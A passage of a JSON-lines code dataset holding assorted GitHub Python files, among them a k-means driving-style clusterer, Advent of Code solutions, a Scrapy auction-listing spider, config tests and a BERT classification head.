'Blergh'}).run()\n","repo_name":"OsnovaDT/FizzBuzz_script","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22365882387","text":"import numpy as np\n#np.set_printoptions(precision=2)\n\nimport pandas as pd\n\nfrom typing import Any, Dict, List, Tuple, NoReturn\n\nimport argparse\nimport os\nimport pickle\n\nfrom sklearn.cluster import KMeans\n\ndef parse_arguments() -> Any:\n\t\"\"\"Parse command line arguments.\"\"\"\n\n\tparser = argparse.ArgumentParser()\n\t\n\tparser.add_argument(\n\t\t\"--data_dir\",\n\t\trequired=True,\n\t\ttype=str,\n\t\thelp=\"Directory where the features (npy files) are saved\",\n\t)\n\n\tparser.add_argument(\n\t\t\"--model_dir\",\n\t\trequired=True,\n\t\ttype=str,\n\t\thelp=\"Directory where the model is saved\",\n\t)\n\n\tparser.add_argument(\n\t\t\"--result_dir\",\n\t\trequired=True,\n\t\ttype=str,\n\t\thelp=\"Directory where the model is saved\",\n\t)\n\n\n\tparser.add_argument(\"--mode\",\n\t\t\t\t\t\trequired=True,\n\t\t\t\t\t\ttype=str,\n\t\t\t\t\t\thelp=\"train/val/test\",\n\t\t\t\t\t\tchoices=['train', 'test', 'val'])\n\n\tparser.add_argument(\"--obs_len\",\n\t\t\t\t\t\tdefault=2,\n\t\t\t\t\t\ttype=int,\n\t\t\t\t\t\thelp=\"Observed length of the trajectory in seconds\",\n\t\t\t\t\t\tchoices=[1,2,3,4,5])\n\n\tparser.add_argument(\"--filter\",\n\t\t\t\t\t\tdefault='ekf',\n\t\t\t\t\t\ttype=str,\n\t\t\t\t\t\thelp=\"Filter to process the data noise. 
(ekf/none/ekf-savgol/savgol\",\n\t\t\t\t\t\tchoices=['ekf', 'none', 'ekf-savgol', 'savgol'])\n\n\treturn parser.parse_args()\n\n\ndef train(data:np.ndarray,\n\t\t obs_len:int,\n\t\t filter_name:str,\n\t\t model_dir:str,\n\t\t result_dir:str,\n\t\t save_model:bool=True)->NoReturn:\n\t\n\tprint('[k-means][train] creating kmeans model...')\n\n\tkmeans = KMeans(n_clusters=3,\n\t\t\t\t\tinit='k-means++',\n\t\t\t\t\tmax_iter=1000,\n\t\t\t\t\ttol=1e-5,\n\t\t\t\t\trandom_state=7,\n\t\t\t\t\talgorithm=\"elkan\")\n\n\tprint('[k-means][train] training...')\n\n\t_y = kmeans.fit_predict(X=data)\n\t_y = np.expand_dims(_y, axis=1)\n\n\tprint('[k-means][train] clusters:')\n\tfor i, c in zip(range(1, 4), kmeans.cluster_centers_):\n\t\tprint (f'\\tc_{i}: {c}')\n\n\tprint('[k-means][train] results:')\n\t_c, _l = np.unique(_y, return_counts=True)\n\tfor i, c in zip(_c,_l):\n\t\tprint (f'\\tc_{i}: {c}')\n\n\tif save_model:\n\t\tmodel_file=f'kmeans_{obs_len}s_{filter_name}.pkl'\n\t\tprint (f'[k-means][train] saving model ({model_file})...')\n\t\twith open(os.path.join(model_dir, model_file), 'wb') as f:\n\t\t\tpickle.dump(kmeans, f)\n\n\n\tresult_file = f'results_kmeans_train_{obs_len}s_{filter_name}.csv'\n\tprint (f'[k-means][train] saving results ({result_file})...')\n\tlabels = ['mean_velocity', \n\t\t\t 'mean_acceleration', \n\t\t\t 'mean_deceleration', \n\t\t\t 'std_lateral_jerk', \n\t\t\t 'driving_style']\n\n\tresult = np.concatenate((data, _y), axis=1)\n\tdf = pd.DataFrame(data=result, columns=labels)\n\tdf.to_csv(os.path.join(result_dir,result_file))\n\n\tresult_file = result_file.replace('results', 'centers').replace('csv', 'txt')\n\tprint (f'[k-means][train] saving results ({result_file})...')\n\tnp.savetxt(os.path.join(result_dir, result_file), \n\t\t\t kmeans.cluster_centers_, \n\t\t\t fmt='%.8f',\n\t\t\t delimiter=',')\n\n\ndef process(data:np.ndarray,\n\t\t obs_len:int,\n\t\t filter_name:str,\n\t\t model_dir:str,\n\t\t result_dir:str,\n\t\t mode:str)->NoReturn:\n\n\tmodel_file=f'kmeans_{obs_len}s_{filter_name}.pkl'\n\tassert os.path.exists(os.path.join(model_dir, model_file)),\\\n\t\tf'[K-Means][{mode}][ERROR] model not found! ({model_file})'\n\n\tprint(f'[k-means][{mode}] loading the model...')\n\tkmeans = None\n\twith open(os.path.join(model_dir, model_file), 'rb') as f:\n\t\t\tkmeans = pickle.load(f)\n\t\n\tassert kmeans is not None,\\\n\t\tf'[K-Means][{mode}][ERROR] error while loading model! 
({model_file})'\n\n\t_y = kmeans.predict(X=data)\n\t_y = np.expand_dims(_y, axis=1)\n\n\tprint(f'[k-means][{mode}] clusters:')\n\tfor i, c in zip(range(1, 4), kmeans.cluster_centers_):\n\t\tprint (f'\\tc_{i}: {c}')\n\n\tprint(f'[k-means][{mode}] results:')\n\t_c, _l = np.unique(_y, return_counts=True)\n\tfor i, c in zip(_c,_l):\n\t\tprint (f'\\tc_{i}: {c}')\n\n\t\n\tresult_file = f'results_kmeans_{mode}_{obs_len}s_{filter_name}.csv'\n\tprint (f'[k-means][{mode}] saving results ({result_file})...')\n\tlabels = ['mean_velocity', \n\t\t\t 'mean_acceleration', \n\t\t\t 'mean_deceleration', \n\t\t\t 'std_lateral_jerk', \n\t\t\t 'driving_style']\n\n\tresult = np.concatenate((data, _y), axis=1)\n\tdf = pd.DataFrame(data=result, columns=labels)\n\tdf.to_csv(os.path.join(result_dir,result_file))\n\n\n\nif __name__ == '__main__':\n\n\t'''\n\t\tapply K-means clustering to classify the data into\n\t\tdriving styles (calm, moderate, aggresive)\n\t'''\n\n\tprint ('[K-means] running....') \n\n\targs = parse_arguments()\n\n\n\tif args.mode == 'test':\n\t\targs.obs_len = 2\n\t\t\n\tassert os.path.exists(args.data_dir),\\\n\t\tf'[K-means][main][ERROR] data_dir not found!({args.data_dir})'\n\n\tdata_file = 'features_{}_{}s_{}.npy'.format(args.mode,\n\t\t\t\t \t\t\t\t\t\t\t\targs.obs_len,\n\t\t\t\t \t\t\t\t\t\t\t\targs.filter)\n\tdata_file = os.path.join(args.data_dir, data_file)\n\n\tassert os.path.exists(data_file),\\\n\t\tf'[K-means][main][ERROR] data_file not found!({data_file})'\n\n\tprint ('[K-means] loading dataset....')\n\t# (m, 4)\n\t# [mean_v, mean_acc, mean_deac, std_jy]\n\tdata = np.load(os.path.join(args.data_dir,data_file))\n\n\tif args.mode == 'train':\n\t\ttrain(data=data,\n\t\t\t save_model=True,\n\t\t\t obs_len=args.obs_len,\n\t\t\t filter_name=args.filter,\n\t\t\t model_dir=args.model_dir,\n\t\t\t result_dir=args.result_dir)\n\n\telif args.mode == 'test':\n\t\tprocess(data=data,\n\t\t\t obs_len=args.obs_len,\n\t\t\t filter_name=args.filter,\n\t\t\t model_dir=args.model_dir,\n\t\t\t result_dir=args.result_dir,\n\t\t\t mode='test')\n\n\telse:#val\n\t\tprocess(data=data,\n\t\t\t obs_len=args.obs_len,\n\t\t\t filter_name=args.filter,\n\t\t\t model_dir=args.model_dir,\n\t\t\t result_dir=args.result_dir,\n\t\t\t mode='val')\n","repo_name":"iag0g0mes/t2fis_driving_style","sub_path":"clustering/kmean.py","file_name":"kmean.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"44"} +{"seq_id":"7893797968","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Apr 17 21:48:15 2020\r\n\r\n@author: Ercan Karaçelik\r\n\"\"\"\r\n\r\n\r\n'''\r\nPDB module \r\n\r\nThe module pdb defines an interactive source code debugger for Python programs.\r\n\r\n'''\r\n\r\nimport pdb\r\n\r\n\r\ndef add(L):\r\n '''\r\n Adds the integer items of a list\r\n '''\r\n size =len(L)\r\n total=0\r\n iterator=0\r\n pdb.set_trace()\r\n while iterator < size:\r\n total +=L[iterator]\r\n iterator+=1\r\n print(f'Iterator is {iterator} total is {total}')\r\n return total\r\n\r\nmy_list=[1,2,3,4,5]\r\nadd(my_list)","repo_name":"Ercion/learning_python","sub_path":"pdb_module_debugging.py","file_name":"pdb_module_debugging.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"34154008457","text":"import re\nfrom collections import deque\nimport sys\nfrom copy import copy, deepcopy\nfrom collections import defaultdict\nfrom lark import Lark\n\n\ndef 
readFile(file):\n with open(file, 'r') as f:\n return f.readlines()\n\n\nlines = readFile('E:\\\\Projects\\\\AdventOfCode2020\\\\d20\\\\input.txt')\n\ni = 0\ntiles = defaultdict(lambda: defaultdict(list))\n\nwhile i < len(lines):\n l = lines[i].strip()\n if 'Tile' in l:\n tile_id = l.split('Tile')[1][:-1].strip()\n i += 1\n tile = lines[i:i+10]\n for index, line in enumerate(tile):\n line = line.strip()\n for c in line:\n tiles[tile_id][index].append(c)\n i += 10\n # print(tiles[tile_id])\n\n i += 1\n\n\nb_tiles = {}\nseen = defaultdict(int)\nfor tile_id in tiles.keys():\n top = ''\n left = ''\n right = ''\n bottom = ''\n for index in tiles[tile_id]:\n line = tiles[tile_id][index]\n if index == 0:\n top = ''.join(line)\n if index == 9:\n bottom = ''.join(line)\n left += line[0]\n right += line[-1]\n\n trans = str.maketrans('#.', '10')\n top = top.translate(trans)\n bottom = bottom.translate(trans)\n right = right.translate(trans)\n left = left.translate(trans)\n b_top = int(top, 2)\n b_bottom = int(bottom, 2)\n b_right = int(right, 2)\n b_left = int(left, 2)\n\n r_top = top[::-1]\n r_bottom = bottom[::-1]\n r_right = right[::-1]\n r_left = left[::-1]\n b_r_top = int(r_top, 2)\n b_r_bottom = int(r_bottom, 2)\n b_r_right = int(r_right, 2)\n b_r_left = int(r_left, 2)\n\n b_tiles[tile_id] = [[b_top, b_bottom, b_right, b_left],\n [b_r_top, b_r_bottom, b_r_right, b_r_left]]\n for v in [b_top, b_bottom, b_right, b_left]:\n seen[v] += 1\n for v in [b_r_top, b_r_bottom, b_r_right, b_r_left]:\n seen[v] += 1\n # seen.update([b_top, b_bottom, b_right, b_left])\n # seen.update([b_r_top, b_r_bottom, b_r_right, b_r_left])\n\n # print(top, bottom, right, left)\n # temp = line.translate(str.maketrans('#.', '10'))\n # print(int(temp, 2))\n # print(temp)\n\nresult = 1\nmin_count = sys.maxsize\n\nfor tile_id in b_tiles.keys():\n order_1 = b_tiles[tile_id][0]\n order_2 = b_tiles[tile_id][1]\n count_1 = -1\n count_2 = -1\n for value in order_1:\n count_1 += seen[value]\n for value in order_2:\n if value in seen.keys():\n count_2 += seen[value]\n # print(tile_id)\n # print(count_1, count_2)\n if count_1 < min_count:\n min_count = count_1\n result = int(tile_id)\n elif count_1 == min_count:\n result *= int(tile_id)\n\nprint(result)\n","repo_name":"Hamza141/AdventOfCode2020","sub_path":"d20/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1171590183","text":"from django.conf import settings\nfrom django.contrib.sites.models import Site\n\ntry:\n import simplejson as json\nexcept ImportError:\n import json\n\nfrom geositeserver.models import GeositeMap\n\ndef geositeserver(request):\n \"\"\"Global values to pass to templates\"\"\"\n site = Site.objects.get_current()\n defaults = dict(\n STATIC_URL=settings.STATIC_URL,\n VERSION=\"2.0.0\",\n SITE_NAME=site.name,\n SITE_DOMAIN=site.domain,\n DEBUG_STATIC=getattr(\n settings,\n \"DEBUG_STATIC\",\n False),\n GEOSITE_SERVER_STATIC_VERSION=settings.GEOSITE_SERVER_STATIC_VERSION,\n GEOSITE_SERVER_STATIC_DEBUG=settings.GEOSITE_SERVER_STATIC_DEBUG,\n GEOSITE_DASHBOARDS_TYPEAHEAD=json.dumps([{'id': d.slug, 'text': d.title} for d in GeositeMap.objects.all().order_by('title')])\n )\n\n return 
defaults\n","repo_name":"wfp-ose/geosite-server","sub_path":"geositeserver/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"14236263827","text":"import copy\n\n# Get the puzzle input, 10a for the example and 10b for the puzzle inputs\nwith open('Day10b.txt') as f:\n adapt = []\n for line in f.readlines():\n adapt.append(int(line.strip()))\n\n# Make a copy of adapt to work with it\nadapters = copy.deepcopy(adapt)\n\n# Initiate a variable to track joltage, single jolts, and triple jolts\njoltage = 0\none_jolt = 0\nthree_jolt = 1\n\n# Get the max size of the adapter in your bag\nmax_adapt = max(adapters)\n\n# While adapter has items in it\nwhile adapters:\n choices = []\n # Look for adapters that are within 3 of the current joltage\n for adapter in adapters:\n if adapter <= joltage + 3:\n choices.append(adapter)\n # Get the difference of the lowest possible number and the current joltage\n diff = min(choices) - joltage\n # Update the 1- and 3-jolt differences as appropriate\n if diff == 1:\n one_jolt += 1\n elif diff == 3:\n three_jolt += 1\n # Update the joltage to equal the lowest of the choices\n joltage = min(choices)\n # Remove the new adapter from the list of adapters\n adapters.remove(min(choices))\n\n# This is the solution to part 1\nprint(f'The product of 1-jolt and 3-jolt differences is {one_jolt * three_jolt}.')\n\n# Create a new copy of the adapters, add 0 and the device (max + 3)\nperms = copy.deepcopy(adapt)\nperms.append(0)\nperms.append(max(perms)+3)\n\n# Sort the list of adapters\nsort_perms = sorted(perms)\n\n# Intiate a variable to multiple the possible permutations\nperm = 1\n\n# Initiate a variable to track the lines and a list to make checks\nline = 0\nchecks = []\n\n# While the line counter is below the length of sorted list\nwhile line < len(sort_perms) - 1:\n # Check to see if the next number in the list is 1 to 2 away\n if sort_perms[line + 1] - sort_perms[line] < 3:\n # If it is add it to checks list and increment the line\n checks.append(sort_perms[line])\n line += 1\n else:\n # Add the current line to the list, it's within 2 of the previous\n checks.append(sort_perms[line])\n # Check the length of check to get the possible permutations\n if len(checks) == 5:\n # Multiply it by the current number of permutations\n perm *= ((2**3) - 1)\n elif len(checks) == 4 or len(checks) == 3:\n perm *= (2**(len(checks) - 2))\n # Empty checks to start the process again\n checks = []\n # Increment the lines\n line += 1\n\n# This is the solution for part 2\nprint(f'The total number of permutation is {perm}.')\n\n\n \n","repo_name":"PNJaenichen/AdventOfCode","sub_path":"2020_AOC/Day10.py","file_name":"Day10.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16958732043","text":"from time import time\nfrom ggame.mathapp import MathApp, _MathDynamic\n\nclass Timer(_MathDynamic):\n \n def __init__(self):\n super().__init__()\n self.once = []\n self.callbacks = {}\n self.reset()\n self.step()\n self.next = None\n MathApp._addDynamic(self) # always dynamically defined\n \n def reset(self):\n \"\"\"\n Set the reference time to the MathApp current time. 
If the timer is used\n or initialized before the app, then set the reference time to match the\n system time instead.\n \n :returns: None\n \"\"\"\n self._reset = MathApp.time\n if not self._reset:\n self._reset = time.time()\n \n def step(self):\n nexttimers = []\n calllist = []\n self.time = MathApp.time - self._reset\n while self.once and self.once[0][0] <= MathApp.time:\n tickinfo = self.once.pop(0)\n if tickinfo[1]: # periodic?\n nexttimers.append((tickinfo[1], self.callbacks[tickinfo][0])) # delay, callback\n calllist.append(self.callbacks[tickinfo].pop(0)) # remove callback and queue it\n if not self.callbacks[tickinfo]: # if the callback list is empty\n del self.callbacks[tickinfo] # remove the dictionary entry altogether\n for tickadd in nexttimers:\n self.callAfter(tickadd[0], tickadd[1], True) # keep it going\n for call in calllist:\n call(self)\n\n def callAfter(self, delay, callback, periodic=False):\n key = (MathApp.time + delay, delay if periodic else 0)\n self.once.append(key)\n callbacklist = self.callbacks.get(key, [])\n callbacklist.append(callback)\n self.callbacks[key] = callbacklist\n self.once.sort()\n \n def callAt(self, time, callback):\n self.callAfter(time-self.time, callback)\n \n def callEvery(self, period, callback):\n self.callAfter(period, callback, True)\n\n def __call__(self):\n return self.time\n\n","repo_name":"mdecd2023/2a3-pj3ag1","sub_path":"cmsimde/static/ggame/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"42981130296","text":"import unittest\n\nimport os\n\nimport json\n\nfrom ridt.config import ConfigFileParser\nfrom ridt.config.ridtconfig import ConsistencyError\n\nfrom ridt.config.configfileparser import ConfigFileParserValidationError\n\n\nclass ST11(unittest.TestCase):\n\n \"\"\"System Test 11. 
Test the system can convert\n config files with ranges of values into a set of\n config object, each which can be evaluated separately.\"\"\"\n\n def setUp(self) -> None:\n\n \"\"\"setUp method that instantiates the\n :class:`~.RIDTConfig` class.\"\"\"\n\n this_dir = os.path.dirname(os.path.abspath(__file__))\n self.config_path = os.path.join(this_dir, \"st06/config.json\")\n with open(self.config_path) as f:\n self.default = json.load(f)\n\n this_dir = os.path.dirname(os.path.abspath(__file__))\n path = os.path.join(this_dir, \"../../default/config.json\")\n with ConfigFileParser(path) as cfp:\n self.c = cfp\n\n def tearDown(self) -> None:\n\n with open(self.config_path, \"w\") as w:\n json.dump(self.default, w)\n\n def test_verify(self):\n\n \"\"\"Verify that the :class:`~.ContourPlots` class\n has the correct scale and range attributes.\"\"\"\n\n self.assertEqual(\n hasattr(self.c.models.eddy_diffusion.planes_plots, \"range\"), True\n )\n self.assertEqual(\n hasattr(self.c.models.eddy_diffusion.planes_plots, \"scale\"), True\n )\n\n def test_contours(self):\n\n with self.assertRaises(ConfigFileParserValidationError):\n with open(self.config_path) as f:\n config = json.load(f)\n config[\"models\"][\"eddy_diffusion\"][\"planes_plots\"][\"contours\"][\"min\"] = \\\n config[\"models\"][\"eddy_diffusion\"][\"planes_plots\"][\"contours\"][\"max\"] + 1\n with open(self.config_path, \"w\") as f:\n json.dump(config, f)\n ConfigFileParser(self.config_path)\n\n def test_range(self):\n\n with self.assertRaises(ConfigFileParserValidationError):\n with open(self.config_path) as f:\n config = json.load(f)\n config[\"models\"][\"eddy_diffusion\"][\"planes_plots\"][\"range\"] = \"test\"\n with open(self.config_path, \"w\") as f:\n json.dump(config, f)\n ConfigFileParser(self.config_path)\n\n def test_scale(self):\n\n with self.assertRaises(ConfigFileParserValidationError):\n with open(self.config_path) as f:\n config = json.load(f)\n config[\"models\"][\"eddy_diffusion\"][\"planes_plots\"][\"scale\"] = \"test\"\n with open(self.config_path, \"w\") as f:\n json.dump(config, f)\n ConfigFileParser(self.config_path)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"riskaware-ltd/ridt","sub_path":"ridt/tests/systemtests/test_st09.py","file_name":"test_st09.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"18830243136","text":"import scrapy\nimport pandas as pd\ndf = pd.read_csv('F:\\Web Scraping\\Golabal\\keywords.csv')\nbase_url = 'https://auctionresource.com/Search?sort=&fromDate=&toDate=&category=&manufacturer=&model=&q={}&zipCode=&distance=&page=1'\n\nclass ResourceSpider(scrapy.Spider):\n name = 'resource'\n def start_requests(self):\n for index in df:\n yield scrapy.Request(base_url.format(index), meta={\"pyppeteer\": True},cb_kwargs={'index':index})\n\n def parse(self, response, index):\n total_pages = response.xpath('//*[@id=\"pageForm\"]/div/select/option[last()]/text()').get() \n current_page = \"\"\n try:\n current_page =response.css('[selected]::text').extract()[1] \n # print(current_page)\n except:\n pass \n link = response.url\n \n if total_pages and current_page:\n if int(current_page) ==1:\n for i in range(2, int(total_pages)+1): \n min = 'page='+str(i-1)\n max = 'page='+str(i)\n link = link.replace(min,max) \n # print(link) \n yield response.follow(link, cb_kwargs={'index':index})\n\n links = response.css(\"h3.hidden-xs a::attr(href)\")\n for link in links:\n yield 
response.follow(\"https://auctionresource.com\"+link.get(), callback=self.parse_item, cb_kwargs={'index':index}) \n \n def parse_item(self, response, index): \n print(\".................\") \n product_url = response.url\n print(product_url)\n image = response.css('img.img-responsive::attr(src)').get().strip()\n print(image)\n \n auction_date = response.css('.list-unstyled li::text').get().strip()\n print(auction_date)\n loc = response.xpath(\"//div[@class='card card-block card-primary']//div[2]/div[2]/text()\").get()\n location = loc.strip()\n print(location)\n product_name = response.css('h2.no-mt.mb-1::text').get().strip()\n print(product_name)\n lot = response.css('div h4::text').get().strip()\n lot_number = lot[5:]\n print(lot_number)\n auctioner = response.css('h3.section-title::text').get().strip()\n print(auctioner)\n description = response.css('div.card-block p::text').get().strip()\n print(description)\n \n yield{\n \n 'product_url' : response.url, \n 'item_type' :index.strip(), \n 'image_link' : image, \n 'auction_date' : auction_date, \n 'location' : location, \n 'product_name' : product_name, \n 'lot_id' : lot_number, \n 'auctioner' : auctioner,\n 'website' : 'auctionresource',\n 'description' : description \n }","repo_name":"Raoshan/auctionresource.com-scrapy-pyppeteer-python","sub_path":"auctionresource/spiders/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"32726632582","text":"class Graph:\n def __init__(self, V):\n self.V = V\n self.adj = [[] for i in range(V)]\n \n def addEdge(self, v, w):\n self.adj[v].append(w)\n self.adj[w].append(v)\n \n def connectedComponents(self):\n visited = []\n cc = []\n for i in range(self.V):\n visited.append(False)\n for v in range(self.V):\n if visited[v] == False:\n temp = []\n cc.append(self.DFS(temp, v, visited))\n return cc\n \n def DFS(self, temp, v, visited):\n visited[v] = True\n temp.append(v)\n for i in self.adj[v]:\n if visited[i] == False:\n temp = self.DFS(temp, i, visited)\n return temp\n \nif __name__ == '__main__':\n g = Graph(5)\n g.addEdge(1, 0)\n g.addEdge(2, 3)\n g.addEdge(3, 4)\n cc = g.connectedComponents()\n print(\"The connected componenets are: \")\n print(cc)\n","repo_name":"srishilesh/Data-Structure-and-Algorithms","sub_path":"Graphs/Number_of_connected_components.py","file_name":"Number_of_connected_components.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"13214795509","text":"import torch\nfrom torch import nn\nfrom transformers import BertPreTrainedModel, BertModel\nimport logging\nfrom typing import List, Optional, Tuple, Union\nfrom torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss\n\nfrom transformers.modeling_outputs import (\n BaseModelOutputWithPastAndCrossAttentions,\n BaseModelOutputWithPoolingAndCrossAttentions,\n CausalLMOutputWithCrossAttentions,\n MaskedLMOutput,\n MultipleChoiceModelOutput,\n NextSentencePredictorOutput,\n QuestionAnsweringModelOutput,\n SequenceClassifierOutput,\n TokenClassifierOutput,\n)\n\nfrom transformers.utils import (\n ModelOutput,\n add_code_sample_docstrings,\n add_start_docstrings,\n add_start_docstrings_to_model_forward,\n logging,\n replace_return_docstrings,\n)\n\nlogger = logging.get_logger(__name__)\n\n_CHECKPOINT_FOR_DOC = \"bert-base-uncased\"\n_CONFIG_FOR_DOC = \"BertConfig\"\n_TOKENIZER_FOR_DOC = 
\"BertTokenizer\"\n\n# SequenceClassification docstring\n_CHECKPOINT_FOR_SEQUENCE_CLASSIFICATION = \"textattack/bert-base-uncased-yelp-polarity\"\n_SEQ_CLASS_EXPECTED_OUTPUT = \"'LABEL_1'\"\n_SEQ_CLASS_EXPECTED_LOSS = 0.01\n\n\nBERT_INPUTS_DOCSTRING = r\"\"\"\n Args:\n input_ids (`torch.LongTensor` of shape `({0})`):\n Indices of input sequence tokens in the vocabulary.\n Indices can be obtained using [`BertTokenizer`]. See [`PreTrainedTokenizer.encode`] and\n [`PreTrainedTokenizer.__call__`] for details.\n [What are input IDs?](../glossary#input-ids)\n attention_mask (`torch.FloatTensor` of shape `({0})`, *optional*):\n Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:\n - 1 for tokens that are **not masked**,\n - 0 for tokens that are **masked**.\n [What are attention masks?](../glossary#attention-mask)\n token_type_ids (`torch.LongTensor` of shape `({0})`, *optional*):\n Segment token indices to indicate first and second portions of the inputs. Indices are selected in `[0,\n 1]`:\n - 0 corresponds to a *sentence A* token,\n - 1 corresponds to a *sentence B* token.\n [What are token type IDs?](../glossary#token-type-ids)\n position_ids (`torch.LongTensor` of shape `({0})`, *optional*):\n Indices of positions of each input sequence tokens in the position embeddings. Selected in the range `[0,\n config.max_position_embeddings - 1]`.\n [What are position IDs?](../glossary#position-ids)\n head_mask (`torch.FloatTensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):\n Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:\n - 1 indicates the head is **not masked**,\n - 0 indicates the head is **masked**.\n inputs_embeds (`torch.FloatTensor` of shape `({0}, hidden_size)`, *optional*):\n Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. This\n is useful if you want more control over how to convert `input_ids` indices into associated vectors than the\n model's internal embedding lookup matrix.\n output_attentions (`bool`, *optional*):\n Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned\n tensors for more detail.\n output_hidden_states (`bool`, *optional*):\n Whether or not to return the hidden states of all layers. 
See `hidden_states` under returned tensors for\n more detail.\n return_dict (`bool`, *optional*):\n Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.\n\"\"\"\n\n\nclass BertForCustomClassification(BertPreTrainedModel):\n def __init__(self, config):\n super().__init__(config)\n self.num_labels = config.num_labels\n self.config = config\n\n self.bert = BertModel(config)\n classifier_dropout = (\n config.classifier_dropout if config.classifier_dropout is not None else config.hidden_dropout_prob\n )\n self.dropout = nn.Dropout(classifier_dropout)\n self.classifier = nn.Linear(config.hidden_size, config.num_labels)\n\n # Initialize weights and apply final processing\n self.post_init()\n\n\n def forward(\n self,\n input_ids: Optional[torch.Tensor] = None,\n attention_mask: Optional[torch.Tensor] = None,\n token_type_ids: Optional[torch.Tensor] = None,\n position_ids: Optional[torch.Tensor] = None,\n head_mask: Optional[torch.Tensor] = None,\n inputs_embeds: Optional[torch.Tensor] = None,\n labels: Optional[torch.Tensor] = None,\n output_attentions: Optional[bool] = None,\n output_hidden_states: Optional[bool] = None,\n return_dict: Optional[bool] = None,\n ) -> Union[Tuple[torch.Tensor], SequenceClassifierOutput]:\n r\"\"\"\n labels (`torch.LongTensor` of shape `(batch_size,)`, *optional*):\n Labels for computing the sequence classification/regression loss. Indices should be in `[0, ...,\n config.num_labels - 1]`. If `config.num_labels == 1` a regression loss is computed (Mean-Square loss), If\n `config.num_labels > 1` a classification loss is computed (Cross-Entropy).\n \"\"\"\n return_dict = return_dict if return_dict is not None else self.config.use_return_dict\n\n outputs = self.bert(\n input_ids,\n attention_mask=attention_mask,\n token_type_ids=token_type_ids,\n position_ids=position_ids,\n head_mask=head_mask,\n inputs_embeds=inputs_embeds,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n )\n\n last_hidden_state = outputs[0]\n cls_representation = last_hidden_state[:,0,:]\n pooled_output = self.dropout(cls_representation)\n logits = self.classifier(pooled_output)\n\n loss = None\n if labels is not None:\n if self.config.problem_type is None:\n if self.num_labels == 1:\n self.config.problem_type = \"regression\"\n elif self.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int):\n self.config.problem_type = \"single_label_classification\"\n else:\n self.config.problem_type = \"multi_label_classification\"\n\n if self.config.problem_type == \"regression\":\n loss_fct = MSELoss()\n if self.num_labels == 1:\n loss = loss_fct(logits.squeeze(), labels.squeeze())\n else:\n loss = loss_fct(logits, labels)\n elif self.config.problem_type == \"single_label_classification\":\n loss_fct = CrossEntropyLoss()\n loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))\n elif self.config.problem_type == \"multi_label_classification\":\n loss_fct = BCEWithLogitsLoss()\n loss = loss_fct(logits, labels)\n if not return_dict:\n output = (logits,) + outputs[2:]\n return ((loss,) + output) if loss is not None else output\n\n return SequenceClassifierOutput(\n loss=loss,\n logits=logits,\n hidden_states=outputs.hidden_states,\n attentions=outputs.attentions,\n 
)\n","repo_name":"dhesin/RNABERT-2","sub_path":"custom_classification_head.py","file_name":"custom_classification_head.py","file_ext":"py","file_size_in_byte":7548,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"44"} +{"seq_id":"19500765991","text":"import sys\n# sys.stdin = open('회전 초밥.txt', 'r')\ninput = sys.stdin.readline\nn, d, k, c = map(int, input().split())\ndishes = []\nfor i in range(n):\n dishes.append(int(input()))\n\n# check for (duplicate) number of dishes\ndef check_seen(seen, i):\n if dishes[i] not in seen:\n seen[dishes[i]] = 0\n seen[dishes[i]] += 1\n return seen\n\nk_dishes = []\nseen = {}\n\n# set k_dishes by pushing index o to k-1 from dishes\nfor i in range(k):\n k_dishes.append(dishes[i])\n seen = check_seen(seen, i)\n\n# set res by calculating diff number of dishes\nres = len(seen.keys())\nif c not in seen.keys():\n res += 1\n\nfor x in range(k, n+k-1):\n i = x%n\n\n # setting k_dishes to represent the next k_dishes by pop and push\n top_dish = k_dishes.pop(0)\n seen[top_dish] -= 1\n if seen[top_dish] == 0:\n seen.pop(top_dish)\n\n k_dishes.append(dishes[i])\n seen = check_seen(seen, i)\n\n # calculate diff number of dishes\n temp_res = len(seen.keys())\n if c not in seen.keys():\n temp_res += 1\n\n res = max(res, temp_res)\nprint(res)\n\n\n\n \n\n","repo_name":"SeungAh-Hong/algorithm-study","sub_path":"Baekjoon/hyunjeong/회전 초밥.py","file_name":"회전 초밥.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"15313727277","text":"def filter_bits(nums: list[str], b: bool) -> int:\n bits = 